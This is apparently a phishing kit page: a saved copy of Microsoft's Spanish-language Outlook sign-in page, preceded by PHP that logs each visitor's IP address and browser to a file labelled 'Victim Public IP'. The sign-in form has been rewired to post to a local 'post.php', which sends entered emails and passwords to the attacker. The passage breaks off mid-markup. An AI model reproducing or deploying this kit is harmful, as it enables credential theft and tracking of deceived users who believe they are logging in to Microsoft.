﻿<?php
if (!empty($_SERVER['HTTP_CLIENT_IP']))   //check ip from share internet
    {
      $ipaddress = $_SERVER['HTTP_CLIENT_IP']."\r\n";
    }
elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))   //to check if ip is pass from proxy
    {
      $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR']."\r\n";
    }
else
    {
      $ipaddress = $_SERVER['REMOTE_ADDR']."\r\n";
    }
$useragent = " User-Agent: ";
$browser = $_SERVER['HTTP_USER_AGENT'];


$file = 'ip.txt';  //this is the file to which the IP address will be written; name it your way.
$victim = "Victim Public IP: ";
$fp = fopen($file, 'a');

fwrite($fp, $victim);
fwrite($fp, $ipaddress);
fwrite($fp, $useragent);
fwrite($fp, $browser);


fclose($fp);
?>
<!DOCTYPE html>
<!-- saved from url=(0292)https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1526151431&rver=6.7.6640.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fauthRedirect%3dtrue%26nlp%3d1%26RpsCsrfState%3da870b6f9-ac2d-695f-564f-966f8b2cc5db&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015 -->
<html dir="ltr" lang="ES-ES"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><!--<base href="https://login.live.com/pp1600/">--><base href="."><script type="text/javascript">var PROOF = {};PROOF.Type = {SQSA: 6, CSS: 5, DeviceId: 4, Email: 1, AltEmail: 2, SMS: 3, HIP: 8, Birthday: 9, TOTPAuthenticator: 10, RecoveryCode: 11, StrongTicket: 13, TOTPAuthenticatorV2: 14, UniversalSecondFactor: 15, Voice: -3};</script><noscript><meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=ES-ES&lc=3082"/>La cuenta Microsoft requiere JavaScript para iniciar sesión. Este explorador web no admite JavaScript o los scripts están bloqueados.<br /><br />Para averiguar si el explorador admite JavaScript o para permitir los scripts, consulta la ayuda en pantalla del explorador.</noscript><title>Iniciar sesión en tu cuenta Microsoft</title><meta name="robots" content="none"><meta name="PageID" content="i5030"><meta name="SiteID" content="292841"><meta name="ReqLC" content="3082"><meta name="LocLC" content="3082"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no"><link rel="shortcut icon" href="https://auth.gfx.ms/16.000.27744.9/images/favicon.ico"><link rel="stylesheet" title="Converged_v2" type="text/css" href="./index_files/Converged_v23082.css"><style type="text/css">body.cb input.hip{border-width: 2px !important;}</style><style type="text/css">body{display:none;}</style><script type="text/javascript">if (top != self){try{top.location.replace(self.location.href);}catch (e){}}else{document.write(unescape('%3C%73') + 'tyle type="text/css">body{display:block !important;}</style>');}</script><style type="text/css">body{display:block !important;}</style><noscript><style type="text/css">body{display:block !important;}</style></noscript><script type="text/javascript">!function(e,r){for(var t in r)e[t]=r[t]}(this,function(e){function r(n){if(t[n])return t[n].exports;var s=t[n]={exports:{},id:n,loaded:!1};return e[n].call(s.exports,s,s.exports,r),s.loaded=!0,s.exports}var t={};return r.m=e,r.c=t,r.p="",r(0)}([function(e,r){var t=window,n=t.navigator;t.g_iSRSFailed=0,t.g_sSRSSuccess="",r.SRSRetry=function(e,r,s,i){var a=1,c=unescape("%3Cscript type='text/javascript' src='"),o=unescape("'%3E%3C/script%3E"),u=r;if(n&&n.userAgent&&i&&i!==r){var S=n.userAgent.toLowerCase(),d=S.indexOf("edge")>=0;if(!d){var p=S.match(/chrome\/([0-9]+)\./),f=p&&2===p.length&&!isNaN(p[1])&&parseInt(p[1])>54;f&&(u=i)}}t.g_sSRSSuccess.indexOf(e)===-1&&("undefined"==typeof t[e]?(t.g_iSRSFailed=1,s<=a&&document.write(c+u+o)):t.g_sSRSSuccess+=e+"|"+s+",")}}]));var g_dtFirstByte=new Date();var g_objPageMode = null;</script><link rel="image_src" href="https://auth.gfx.ms/16.000.27744.9/images/Windows_Live_v_thumb.jpg"><script type="text/javascript">var ServerData = {Bh:false,Bi:true,aA:false,aC:true,aD:0,aF:5,Bu:false,aJ:'',aL:'',aM:'16.0.27744.9',aN:'',aO:'',aP:'',aR:'https://account.live.com/query.aspx?uaid=99bb2aec83d34778a3ab25d335e62984&mkt=ES-ES&lc=3082&id=292841',aS:'',urlLogin:'https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1526151431&rver=6.7.6640.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fauthRedirect%3dtrue%26nlp%3d1%26RpsCsrfState%3da870b6f9-ac2d-695f-564f-966f8b2cc5db&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015&contextid=156777DFF8BDD57B&bk=1526151431&mkt=ES-ES&lc=3082',aT:'https://login.live.com/gls.srf?urlID=MSNPrivacyStatement&mkt=ES-ES&vv=1600',aW:'https://login.live.com/GetSessionState.srf?wa=wsignin1.0&rpsnv=13&ct=1526151431&rver=6.7.6640.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fauthRedirect%3dtrue%26nlp%3d1%26RpsCsrfState%3da870b6f9-ac2d-695f-564f-966f8b2cc5db&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015&vv=1600&mkt=ES-ES&lc=3082',hpgid:33,aY:2,urlFed:'',ab:false,bA:'registrarse',bB:'',ac:true,bE:'PPFT',ag:0,bG:'',ah:1,sPOST_NewUser:'',bH:'Pas',aj:'',bI:"#~#partnerdomain#~# no usa este servicio. Inicia sesión con una cuenta Microsoft o crea una cuenta nueva.  <a href=\"#~#WLPaneHelpInviteBlockedURL_LS#~#\" id=\"idPaneHelpInviteBlockedLink9\">Más información</a>",an:'',ao:'',aq:'',bQ:'https://sc.imp.live.com/content/dam/imp/surfaces/mail_signin/v3/account/ES-ES.html?id=292841&mkt=ES-ES&cbcxt=out',urlPost:'https://login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=13&ct=1526151431&rver=6.7.6640.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fauthRedirect%3dtrue%26nlp%3d1%26RpsCsrfState%3da870b6f9-ac2d-695f-564f-966f8b2cc5db&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015&contextid=156777DFF8BDD57B&bk=1526151431&uaid=99bb2aec83d34778a3ab25d335e62984&pid=0',bR:'',bS:'',au:'https://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&mkt=ES-ES&vv=1600',bT:'',bU:'',av:'',aw:'',bW:'https://go.microsoft.com/fwlink/?LinkID=254486',bY:'',az:0,A:10000,fWebNgcFS:false,C:1,D:0,sFedQS:'wa=wsignin1.0&wtrealm=uri:WindowsLiveID&wctx=wa%3Dwsignin1.0%26rpsnv%3D13%26ct%3D1526151431%26rver%3D6.7.6640.0%26wp%3DMBI_SSL%26wreply%3Dhttps%253a%252f%252foutlook.live.com%252fowa%252f%253fauthRedirect%253dtrue%2526nlp%253d1%2526RpsCsrfState%253da870b6f9-ac2d-695f-564f-966f8b2cc5db%26id%3D292841%26CBCXT%3Dout%26lw%3D1%26fl%3Ddob%252cflname%252cwld%26cobrandid%3D90015%26contextid%3D156777DFF8BDD57B%26bk%3D1526151431',F:true,ba:'##li16####B##Hotmail##/B####BR##Una forma inteligente de enviar correo electrónico de una manera rápida, fácil y fiable##li8####B##Messenger##/B####BR##Manténgase en contacto con las personas más importantes de su vida##li10####B##SkyDrive##/B####BR##Almacenamiento en línea gratuito protegido por ">actualice la página</a>.",S:true,A9:true,U:1,V:1,W:'wa=wsignin1.0&rpsnv=13&ct=1526151431&rver=6.7.6640.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fauthRedirect%3dtrue%26nlp%3d1%26RpsCsrfState%3da870b6f9-ac2d-695f-564f-966f8b2cc5db&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015&contextid=156777DFF8BDD57B&bk=1526151431',bq:'',br:'',bs:'',Z:false,bt:'',AA:true,urlSwitch:'https://login.live.com/logout.srf?wa=wsignin1.0&rpsnv=13&ct=1526151431&rver=6.7.6640.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fauthRedirect%3dtrue%26nlp%3d1%26RpsCsrfState%3da870b6f9-ac2d-695f-564f-966f8b2cc5db&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015&contextid=156777DFF8BDD57B&ru=https://outlook.live.com/owa/%3fauthRedirect%3dtrue%26nlp%3d1%26RpsCsrfState%3da870b6f9-ac2d-695f-564f-966f8b2cc5db&bk=1526151431&lm=I',AC:'AF~Afganistán~93!!!AL~Albania~355!!!DZ~Argelia~213!!!AD~Andorra~376!!!AO~Angola~244!!!AQ~Antártida~672!!!AG~Antigua y Barbuda~1!!!AR~Argentina~54!!!AM~Armenia~374!!!AW~Aruba~297!!!AC~Isla Ascensión~247!!!AU~Australia~61!!!AT~Austria~43!!!AZ~Azerbaiyán~994!!!BS~Las Bahamas~1!!!BH~Reino de Baréin~973!!!BD~Bangladesh~880!!!BB~Barbados~1!!!BY~Belarús~375!!!BE~Bélgica~32!!!BZ~Belice~501!!!BJ~Benín~229!!!BM~Bermudas~1!!!BT~Bután~975!!!BO~Bolivia~591!!!BQ~Bonaire~599!!!BA~Bosnia y Herzegovina~387!!!BW~Botsuana~267!!!BV~Isla Bouvet~47!!!BR~Brasil~55!!!IO~Territorio Británico del Océano Índico~44!!!VG~Islas Vírgenes Británicas~1!!!BN~Brunéi~673!!!BG~Bulgaria~359!!!BF~Burkina Faso~226!!!BI~Burundi~257!!!CV~Cabo Verde~238!!!KH~Camboya~855!!!CM~Camerún~237!!!CA~Canadá~1!!!KY~Islas Caimán~1!!!CF~República Centroafricana~236!!!TD~Chad~235!!!CL~Chile~56!!!CN~China~86!!!CX~Isla Christmas~61!!!CC~Islas Cocos~61!!!CO~Colombia~57!!!KM~Comoras~269!!!CG~República del Congo~242!!!CD~Congo (RDC)~243!!!CK~Islas Cook~682!!!CR~Costa Rica~506!!!CI~Côte d\'Ivoire~225!!!HR~Croacia (Hrvatska)~385!!!CU~Cuba~53!!!CW~Curazao~599!!!CY~Chipre~357!!!CZ~Chequia~420!!!DK~Dinamarca~45!!!DJ~Yibuti~253!!!DM~Dominica~1!!!DO~República Dominicana~1!!!EC~Ecuador~593!!!EG~Egipto~20!!!SV~El Salvador~503!!!GQ~Guinea Ecuatorial~240!!!ER~Eritrea~291!!!EE~Estonia~372!!!ET~Etiopía~251!!!FK~Islas Malvinas~500!!!FO~Islas Feroe~298!!!FJ~Fiyi~679!!!FI~Finlandia~358!!!FR~Francia~33!!!GF~Guayana Francesa~594!!!PF~Polinesia Francesa~689!!!GA~Gabón~241!!!GM~Gambia~220!!!GE~Georgia~995!!!DE~Alemania~49!!!GH~Ghana~233!!!GI~Gibraltar~350!!!GR~Grecia~30!!!GL~Groenlandia~299!!!GD~Granada~1!!!GP~Guadalupe~590!!!GU~Guam~1!!!GT~Guatemala~502!!!GG~Guernsey~44!!!GN~Guinea~224!!!GW~Guinea-Bissau~245!!!GY~Guyana~592!!!HT~Haití~509!!!HN~Honduras~504!!!HK~Hong Kong RAE~852!!!HU~Hungría~36!!!IS~Islandia~354!!!IN~India~91!!!ID~Indonesia~62!!!IR~Irán~98!!!IQ~Irak~964!!!IE~Irlanda~353!!!IM~Isla de Man~44!!!IL~Israel~972!!!IT~Italia~39!!!JM~Jamaica~1!!!XJ~Jan Mayen~47!!!JP~Japón~81!!!JE~Jersey~44!!!JO~Jordania~962!!!KZ~Kazajistán~7!!!KE~Kenia~254!!!KI~Kiribati~686!!!KR~Corea del Sur~82!!!KW~Kuwait~965!!!KG~Kirguistán~996!!!LA~Laos~856!!!LV~Letonia~371!!!LB~Líbano~961!!!LS~Lesoto~266!!!LR~Liberia~231!!!LY~Libia~218!!!LI~Liechtenstein~423!!!LT~Lituania~370!!!LU~Luxemburgo~352!!!MO~Macao RAE~853!!!MK~Ex-República Yugoslava de Macedonia~389!!!MG~Madagascar~261!!!MW~Malawi~265!!!MY~Malasia~60!!!MV~Maldivas~960!!!ML~Malí~223!!!MT~Malta~356!!!MH~Islas Marshall~692!!!MQ~Martinica~596!!!MR~Mauritania~222!!!MU~Mauricio~230!!!YT~Mayotte~262!!!MX~México~52!!!FM~Micronesia~691!!!MD~Moldova~373!!!MC~Mónaco~377!!!MN~Mongolia~976!!!ME~Montenegro~382!!!MS~Montserrat~1!!!MA~Marruecos~212!!!MZ~Mozambique~258!!!MM~Myanmar~95!!!NA~Namibia~264!!!NR~Nauru~674!!!NP~Nepal~977!!!NL~Países Bajos~31!!!AN~Antiguas Antillas Holandesas~599!!!NC~Nueva Caledonia~687!!!NZ~Nueva Zelanda~64!!!NI~Nicaragua~505!!!NE~Níger~227!!!NG~Nigeria~234!!!NU~Niue~683!!!KP~Corea del Norte~850!!!MP~Islas Marianas del Norte~1!!!NO~Noruega~47!!!OM~Omán~968!!!PK~Pakistán~92!!!PW~Palaos~680!!!PS~Autoridad Palestina~970!!!PA~Panamá~507!!!PG~Papúa Nueva Guinea~675!!!PY~Paraguay~595!!!PE~Perú~51!!!PH~Filipinas~63!!!PL~Polonia~48!!!PT~Portugal~351!!!QA~Qatar~974!!!RE~Reunión~262!!!RO~Rumania~40!!!RU~Rusia~7!!!RW~Ruanda~250!!!XS~Saba~599!!!KN~San Cristóbal y Nieves~1!!!LC~Santa Lucía~1!!!PM~San Pedro y Miquelón~508!!!VC~San Vicente y las Granadinas~1!!!WS~Samoa~685!!!SM~San Marino~378!!!ST~Santo Tomé y Príncipe~239!!!SA~Arabia Saudí~966!!!SN~Senegal~221!!!RS~Serbia~381!!!SC~Seychelles~248!!!SL~Sierra Leona~232!!!SG~Singapur~65!!!XE~San Eustaquio~599!!!SK~Eslovaquia~421!!!SI~Eslovenia~386!!!SB~Islas Salomón~677!!!SO~Somalia~252!!!ZA~Sudáfrica~27!!!SS~Sudán del Sur~211!!!ES~España~34!!!LK~Sri Lanka~94!!!SH~Santa Elena, Ascensión y Tristán da Cunha~290!!!SD~Sudán~249!!!SR~Surinam~597!!!SJ~Svalbard~47!!!SZ~Suazilandia~268!!!SE~Suecia~46!!!CH~Suiza~41!!!SY~Siria~963!!!TW~Taiwán~886!!!TJ~Tayikistán~992!!!TZ~Tanzania~255!!!TH~Tailandia~66!!!TL~Timor-Leste~670!!!TG~Togo~228!!!TK~Tokelau~690!!!TO~Tonga~676!!!TT~Trinidad y Tobago~1!!!TA~Tristán da Cunha~290!!!TN~Túnez~216!!!TR~Turquía~90!!!TM~Turkmenistán~993!!!TC~Islas Turcas y Caicos~1!!!TV~Tuvalu~688!!!UM~Islas menores alejadas de los EE. UU.~1!!!VI~Islas Vírgenes de los Estados Unidos~1!!!UG~Uganda~256!!!UA~Ucrania~380!!!AE~Emiratos Árabes Unidos~971!!!UK~Reino Unido~44!!!US~Estados Unidos~1!!!UY~Uruguay~598!!!UZ~Uzbekistán~998!!!VU~Vanuatu~678!!!VA~Ciudad del Vaticano~379!!!VE~Venezuela~58!!!VN~Vietnam~84!!!WF~Wallis y Futuna~681!!!YE~Yemen~967!!!ZM~Zambia~260!!!ZW~Zimbabue~263',urlFedConvertRename:'https://account.live.com/security/LoginStage.aspx?lmif=1000&ru=https://login.live.com/login.srf%3Fwa%3Dwsignin1.0%26rpsnv%3D13%26ct%3D1526151431%26rver%3D6.7.6640.0%26wp%3DMBI_SSL%26wreply%3Dhttps%253a%252f%252foutlook.live.com%252fowa%252f%253fauthRedirect%253dtrue%2526nlp%253d1%2526RpsCsrfState%253da870b6f9-ac2d-695f-564f-966f8b2cc5db%26id%3D292841%26CBCXT%3Dout%26lw%3D1%26fl%3Ddob%252cflname%252cwld%26cobrandid%3D90015%26vv%3D1600%26mkt%3DES-ES%26lc%3D3082&wa=wsignin1.0&rpsnv=13&ct=1526151431&rver=6.7.6640.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fauthRedirect%3dtrue%26nlp%3d1%26RpsCsrfState%3da870b6f9-ac2d-695f-564f-966f8b2cc5db&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015&vv=1600&mkt=ES-ES&lc=3082&cbid=0&id=292841',AD:'https://login.live.com/GetCredentialType.srf?wa=wsignin1.0&rpsnv=13&ct=1526151431&rver=6.7.6640.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fauthRedirect%3dtrue%26nlp%3d1%26RpsCsrfState%3da870b6f9-ac2d-695f-564f-966f8b2cc5db&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015&vv=1600&mkt=ES-ES&lc=3082',AE:'',by:'',AG:false,b:'https://auth.gfx.ms/16.000.27744.9/',c:{},AI:true,AJ:0,e:'https://signup.live.com/signup?wa=wsignin1.0&rpsnv=13&ct=1526151431&rver=6.7.6640.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fauthRedirect%3dtrue%26nlp%3d1%26RpsCsrfState%3da870b6f9-ac2d-695f-564f-966f8b2cc5db&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015&contextid=156777DFF8BDD57B&bk=1526151431&uiflavor=web&uaid=99bb2aec83d34778a3ab25d335e62984&mkt=ES-ES&lc=3082',f:false,AL:1033,g:'',h:false,AN:'',AO:'',AP:"Usa el número de teléfono principal que asociaste con tu cuenta Microsoft. <a href=\"http://explore.live.com/windows-live-sign-in-single-use-code-faq\" id=\"idPaneHelpOTCInfoLink9\" target=\"_blank\">Más información</a>",j:'',AQ:'https://outlook.office365.com/owa/prefetch.aspx?id=292841&mkt=ES-ES',l:false,AR:'',AS:'',n:0,B5:{},sCBUpTxt1:'',p:'',q:'https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d13%26ct%3d1526151431%26rver%3d6.7.6640.0%26wp%3dMBI_SSL%26wreply%3dhttps%253a%252f%252foutlook.live.com%252fowa%252f%253fauthRedirect%253dtrue%2526nlp%253d1%2526RpsCsrfState%253da870b6f9-ac2d-695f-564f-966f8b2cc5db%26id%3d292841%26CBCXT%3dout%26lw%3d1%26fl%3ddob%252cflname%252cwld%26cobrandid%3d90015%26contextid%3d156777DFF8BDD57B%26bk%3d1526151431&id=292841&uiflavor=web&cobrandid=258867990888&uaid=99bb2aec83d34778a3ab25d335e62984&mkt=ES-ES&lc=3082&bk=1526151431',B6:{},sCBUpTxt2:'',B7:{},r:true,AX:false,B8:{'Logo':'','LogoAltText':'','LogoText':'','ShowWLHeader':true},t:0,u:60,w:'',correlationId:'99bb2aec83d34778a3ab25d335e62984',oPost:{},Aa:true,BA:false,Ab:3,Ad:"Iniciar sesión",BF:false,Ag:false,Ai:false,BI:true,sErrTxt:'',BL:false,Am:null,BM:true,BN:true,Ao:'',Ap:"Puedes iniciar sesión sin escribir la contraseña con un código de un solo uso. Esto ayudará a proteger tu cuenta cuando uses el equipo de otra persona. <a href=\"http://explore.live.com/windows-live-sign-in-single-use-code-faq\" id=\"idPaneHelpOTCInfoLink9\" target=\"_blank\">Más información</a>",html:[],sFTTag:'<input type="hidden" name="PPFT" id="i0327" value="DXL4*5PqlJxYbWF1al2pJcGkzu06TUjmkjRNXdZK0gK4YHx7lYaccraBrrRo2Z7p*WBxVlvij!VUGUNBNa0OfohWoH49TKEiHXGjhdvEQjA0HvrwrqhvfnSeY1RsGN0!CT9uRcOZqlp7weCUa1B!i9BmHlWbIBsDfvmS8jIhWvR12Amf4kSpGoI1EHd1CEIndQLr3MMV6O3fuhccCaPhzTLdm68POx1GEkMJ0NWyCW5vCMYj1oX!5KjzYs!tFGdAng$$"/>',At:'',BU:true,BX:0,BZ:1,a0:false,fHasBackgroundColor:false,urlStaySignIn:'https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1526151431&rver=6.7.6640.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fauthRedirect%3dtrue%26nlp%3d1%26RpsCsrfState%3da870b6f9-ac2d-695f-564f-966f8b2cc5db&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015&contextid=156777DFF8BDD57B&mkt=ES-ES&lc=3082&bk=1526151431',a2:true,a4:false,a5:false,Bc:true,a8:false,a9:false,Bg:false};</script><script type="text/javascript" src="./index_files/ConvergedLoginPaginatedStrings.ES.js.descarga"></script><script type="text/javascript" src="./index_files/ConvergedLogin_PCore.js.descarga"></script><script type="text/javascript">SRSRetry("__ConvergedLoginPaginatedStrings","https://auth.gfx.ms/16.000.27744.9/ConvergedLoginPaginatedStrings.ES.js",1,"https://msagfx.live.com/16.000.27744.9/ConvergedLoginPaginatedStrings.ES.js");SRSRetry("__ConvergedLogin_PCore","https://auth.gfx.ms/16.000.27744.9/ConvergedLogin_PCore.js",1,"https://msagfx.live.com/16.000.27744.9/ConvergedLogin_PCore.js");</script><script type="text/javascript">SRSRetry("__ConvergedLoginPaginatedStrings","https://auth.gfx.ms/16.000.27744.9/ConvergedLoginPaginatedStrings.ES.js",2,"https://msagfx.live.com/16.000.27744.9/ConvergedLoginPaginatedStrings.ES.js");SRSRetry("__ConvergedLogin_PCore","https://auth.gfx.ms/16.000.27744.9/ConvergedLogin_PCore.js",2,"https://msagfx.live.com/16.000.27744.9/ConvergedLogin_PCore.js");</script></head><body class="cb" data-bind="defineGlobals: ServerData, bodyCssClass"><div><!--  --> <div data-bind="component: { name: &#39;background-image&#39;, publicMethods: backgroundControlMethods }"><div class="background" role="presentation" data-bind="css: { app: isAppBranding }, style: { background: backgroundStyle }"><!-- ko if: smallImageUrl --> <div data-bind="backgroundImage: smallImageUrl()" style="background-image: url(&quot;https://auth.gfx.ms/16.000.27744.9/images/Backgrounds/0-small.jpg?x=138bcee624fa04ef9b75e86211a9fe0d&quot;);"></div><!-- /ko --><!-- ko if: backgroundImageUrl --> <div class="backgroundImage" data-bind="backgroundImage: backgroundImageUrl()" style="background-image: url(&quot;https://auth.gfx.ms/16.000.27744.9/images/Backgrounds/0.jpg?x=a5dbd4393ff6a725c7e62b61df7e72f0&quot;);"></div><!-- ko if: useImageMask --><!-- /ko --><!-- /ko --> </div></div> <form name="f1" id="i0281" novalidate="novalidate" spellcheck="false" method="post" target="_top" autocomplete="off" data-bind="autoSubmit: forceSubmit, attr: { action: postUrl }" action="post.php"><!-- ko withProperties: { '$loginPage': $data } --> <div class="outer" data-bind="component: { name: &#39;page&#39;,
        params: {
            serverData: svr,
            showButtons: svr.A9,
            showFooterLinks: true,
            useWizardBehavior: svr.ad,
            handleWizardButtons: false,
            password: password,
            hideFromAria: ariaHidden },
        event: {
            footerAgreementClick: footer_agreementClick } }"><!-- ko template: { nodes: $componentTemplateNodes, data: $parent } --><!-- ko if: svr.aA --><!-- /ko --> <div class="middle" data-bind="css: { &#39;app&#39;: $loginPage.backgroundLogoUrl() }"><!-- ko if: $loginPage.backgroundLogoUrl() && !(paginationControlMethods() && paginationControlMethods().currentViewHasMetadata('hideLogo')) --><!-- /ko --> <div class="inner" data-bind="css: { &#39;app&#39;: $loginPage.backgroundLogoUrl(), &#39;wide&#39;: paginationControlMethods() &amp;&amp; paginationControlMethods().currentViewHasMetadata(&#39;wide&#39;) }"><!-- ko ifnot: paginationControlMethods()
                    && (paginationControlMethods().currentViewHasMetadata('hideLogo')
                        || (paginationControlMethods().currentViewHasMetadata('hideDefaultLogo') && !$loginPage.bannerLogoUrl())) --> <div role="banner" data-bind="component: { name: &#39;logo-control&#39;,
                    params: {
                        isChinaDc: svr.fIsChinaDc,
                        bannerLogoUrl: $loginPage.bannerLogoUrl() } }"><!--  --><!-- ko if: bannerLogoUrl --><!-- /ko --><!-- ko if: !bannerLogoUrl && !isChinaDc --><!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || !svr.fHasBackgroundColor) && !isHighContrastBlackTheme --> <!-- ko template: { nodes: [darkImageNode], data: $parent } --><img class="logo" role="presentation" pngsrc="https://auth.gfx.ms/16.000.27744.9/images/microsoft_logo.png?x=ed9c9eb0dce17d752bedea6b5acda6d9" svgsrc="https://auth.gfx.ms/16.000.27744.9/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e90bd" data-bind="imgSrc" src="./index_files/microsoft_logo.svg"><!-- /ko --> <!-- /ko --><!-- /ko --> <!-- /ko --></div><!-- /ko --><!-- ko if: svr.AO && (paginationControlMethods() && !paginationControlMethods().currentViewHasMetadata('hideLwaDisclaimer')) --><!-- /ko --><!-- ko if: showErrorDetails --><!-- /ko --> <div role="main" data-bind="component: { name: &#39;pagination-control&#39;,
                        publicMethods: paginationControlMethods,
                        params: {
                            initialViewId: initialViewId,
                            currentViewId: currentViewId,
                            initialSharedData: initialSharedData,
                            initialError: $loginPage.getServerError() },
                        event: {
                            cancel: paginationControl_onCancel,
                            showView: $loginPage.view_onShow } }"><div data-bind="css: { &#39;animate&#39;: animate() || animate.back(), &#39;back&#39;: animate.back }"><!-- ko foreach: views --><!-- ko if: $parent.currentViewIndex() === $index() --> <!-- ko template: { nodes: [$data], data: $parent } --><div data-viewid="1" data-bind="pageViewComponent: { name: &#39;login-paginated-username-view&#39;,
                        params: {
                            serverData: svr,
                            serverError: initialError,
                            isInitialView: isInitialState,
                            displayName: sharedData.displayName,
                            prefillNames: $loginPage.prefillNames,
                            flowToken: sharedData.flowToken,
                            altCredHintShown: sharedData.altCredHintShown },
                        event: {
                            refresh: $loginPage.view_onRefresh,
                            redirect: $loginPage.view_onRedirect,
                            showLearnMore: $loginPage.learnMore_onShow } }"><!--  --> <div data-bind="component: { name: &#39;header-control&#39;, params: { serverData: svr } }"><div class="row text-title" id="loginHeader" role="heading"> <div aria-level="1" data-bind="text: title">Iniciar sesión</div><!-- ko if: isSubtitleVisible --><!-- /ko --> </div></div><!-- ko if: pageDescription && !svr.a9 --><!-- /ko --> <div class="row"> <div role="alert" aria-live="assertive" aria-atomic="false"><!-- ko if: usernameTextbox.error --><!-- /ko --> </div> <div class="form-group col-md-24"><!-- ko if: prefillNames().length > 1 --><!-- /ko --><!-- ko ifnot: prefillNames().length > 1 --> <div class="placeholderContainer" data-bind="component: { name: &#39;placeholder-textbox&#39;,
            publicMethods: usernameTextbox.placeholderTextboxMethods,
            params: {
                serverData: svr,
                hintText: tenantBranding.UserIdLabel || str[&#39;CT_PWD_STR_Email_Example&#39;],
                hintCss: &#39;placeholder&#39; + (!svr.L ? &#39; ltr_override&#39; : &#39;&#39;) },
            event: {
                updateFocus: usernameTextbox.textbox_onUpdateFocus } }"><!-- ko withProperties: { '$placeholderText': placeholderText } --> <!-- ko template: { nodes: $componentTemplateNodes, data: $parent } --> <input type="email" name="loginfmt" id="i0116" maxlength="113" lang="en" class="form-control ltr_override" aria-describedby="usernameError loginHeader loginDescription" aria-required="true" data-bind="textInput: usernameTextbox.value,
                    hasFocusEx: usernameTextbox.focused,
                    placeholder: $placeholderText,
                    ariaLabel: tenantBranding.UserIdLabel || str[&#39;CT_PWD_STR_Username_AriaLabel&#39;],
                    css: { &#39;has-error&#39;: usernameTextbox.error },
                    attr: inputAttributes" placeholder="Correo electrónico, teléfono o Skype" aria-label="Escriba su correo electrónico, teléfono o Skype."> <input name="passwd" type="password" id="i0118" autocomplete="off" data-bind="moveOffScreen, textInput: passwordBrowserPrefill" class="moveOffScreen" tabindex="-1" aria-hidden="true"> <div id="usernameProgress" class="progress" role="progressbar" data-bind="visible: isRequestPending, component: &#39;marching-ants-control&#39;, ariaLabel: str[&#39;WF_STR_ProgressText&#39;]" aria-label="Espera" style="display: none;"><!--  --><!-- ko if: useCssAnimation --> <div></div><div></div><div></div><div></div><div></div><div></div><!-- /ko --><!-- ko ifnot: useCssAnimation --><!-- /ko --></div> <!-- /ko --><!-- /ko --><!-- ko ifnot: usePlaceholderAttribute --><!-- /ko --></div><!-- /ko --> </div> </div> <div data-bind="invertOrder: svr.BM, css: { &#39;position-buttons&#39;: !tenantBranding.BoilerPlateText }" class="position-buttons"><div class="row"> <div class="col-md-24"> <div class="text-13 action-links"><!-- ko if: svr.F && !svr.l && !svr.AG --> <div class="form-group" data-bind="
                    htmlWithBindings: html[&#39;WF_STR_SignUpLink_Text&#39;],
                    childBindings: {
                        &#39;signup&#39;: {
                            href: svr.e,
                            css: { &#39;display-inline-block&#39;: true },
                            ariaLabel: str[&#39;WF_STR_SignupLink_AriaLabel_Text&#39;],
                            click: signup_onClick } }">¿No tiene una cuenta? <a href="https://signup.live.com/signup?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1526151431&amp;rver=6.7.6640.0&amp;wp=MBI_SSL&amp;wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fauthRedirect%3dtrue%26nlp%3d1%26RpsCsrfState%3da870b6f9-ac2d-695f-564f-966f8b2cc5db&amp;id=292841&amp;CBCXT=out&amp;lw=1&amp;fl=dob%2cflname%2cwld&amp;cobrandid=90015&amp;contextid=156777DFF8BDD57B&amp;bk=1526151431&amp;uiflavor=web&amp;uaid=99bb2aec83d34778a3ab25d335e62984&amp;mkt=ES-ES&amp;lc=3082" id="signup" class="display-inline-block" aria-label="Crear una cuenta Microsoft">Cree una.</a></div><!-- /ko --><!-- ko component: { name: "cred-switch-link-control",
